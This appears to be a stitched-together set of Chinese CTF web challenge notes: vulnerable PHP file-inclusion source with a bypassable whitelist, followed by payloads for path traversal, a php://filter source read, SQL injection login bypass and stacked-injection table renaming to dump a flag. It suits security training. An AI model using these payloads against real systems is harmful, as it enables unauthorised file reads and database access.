<?php
highlight_file(__FILE__);
class emmm
{
public static function checkFile(&$page)
{
//定义了一个数组
$whitelist = ["source"=>"source.php","hint"=>"hint.php"];
// 判断,变量是否为空,是否不是字符串
if (! isset($page) || !is_string($page)) {
echo "you can't see it";
return false;
}
// 如果参数存在于数组中,返回true
if (in_array($page, $whitelist)) {
return true;
}
// mb_substr是截取函数,从0到?
$_page = mb_substr(
$page,
0,
mb_strpos($page . '?', '?')
);
// 如果变量在数组中,返回true
if (in_array($_page, $whitelist)) {
return true;
}
// 先进行url解码,然后截取字符,如果变量在数组中没返回true
$_page = urldecode($page);
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
echo "you can't see it";
return false;
}
}
if (! empty($_REQUEST['file'])
&& is_string($_REQUEST['file'])
&& emmm::checkFile($_REQUEST['file'])
) {
include $_REQUEST['file'];
exit;
} else {
echo "
";
}
?>
可以看到函数代码中有四个if语句
第一个if语句对变量进行检验,要求$page为字符串,否则返回false
第二个if语句判断$page是否存在于$whitelist数组中,存在则返回true
第三个if语句判断截取后的$page是否存在于$whitelist数组中,截取$page中'?'前部分,存在则返回true
第四个if语句判断url解码并截取后的$page是否存在于$whitelist中,存在则返回true
若以上四个if语句均未返回值,则返回false
有三个if语句可以返回true,第二个语句直接判断$page,不可用
第三个语句截取'?'前部分,由于?被后部分被解析为get方式提交的参数,也不可利用
第四个if语句中,先进行url解码再截取,因此我们可以将?经过两次url编码,在服务器端提取参数时解码一次,checkFile函数中解码一次,仍会解码为'?',仍可通过第四个if语句校验。('?'两次编码值为'%253f'),构造url:
所以我们的payload 就是
file=source.php?file=source.php%253f../../../../../ffffllllaaaagggg
payload:/check.php?username=admin'%20or%201=1%23&password=123
先看网页源代码吧
试了试cat=dog居然解出flag了。可能是那种签到题吧
首先题目是include,所以会往文件包含去想
尝试使用php://filter伪协议
payload:?file=php://filter/read=convert.base64-encode/resource=flag.php
单引号报错,找到注入点
union select 进行测试
然后就想到了堆叠注入,别问我怎么知道的。我被深育杯第一个虐惨了!!!
好像也就ctftraining这一个有用呗
然后看看表
然后看看两张表的结构
那么可以猜测我们提交查询的窗口就是在这个表里查询数据的
因为可以堆叠查询,这时候就想到了一个改名的方法,把words随便改成words1,然后把1919810931114514改成words,再把列名flag改成id,结合上面的1’ or 1=1#爆出表所有内容就可以查flag啦
1';rename words to words1;rename `1919810931114514` to words;alter table flag id varchar(100) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL;desc words;#
再用一下一开始的操作id=1’ or 1=1#
https://www.cnblogs.com/wjw-zm/p/12359735.html
select都可以用
这道题目需要我们去对后端语句进行猜测
1、输入非零数字得到的回显1和输入其余字符得不到回显=>来判断出内部的查询语句可能存在有||
2、也就是select 输入的数据||内置的一个列名 from 表名=>即为
select post进去的数据||flag from Flag(含有数据的表名,通过堆叠注入可知)
此时的||起到的作用是or的作用
内置的sql语句为
sql=“select”.post[‘query’]."||flag from Flag";
如果$post[‘query’]的数据为*,1,sql语句就变成了
select *,1||flag from Flag
也就是
select *,1 from Flag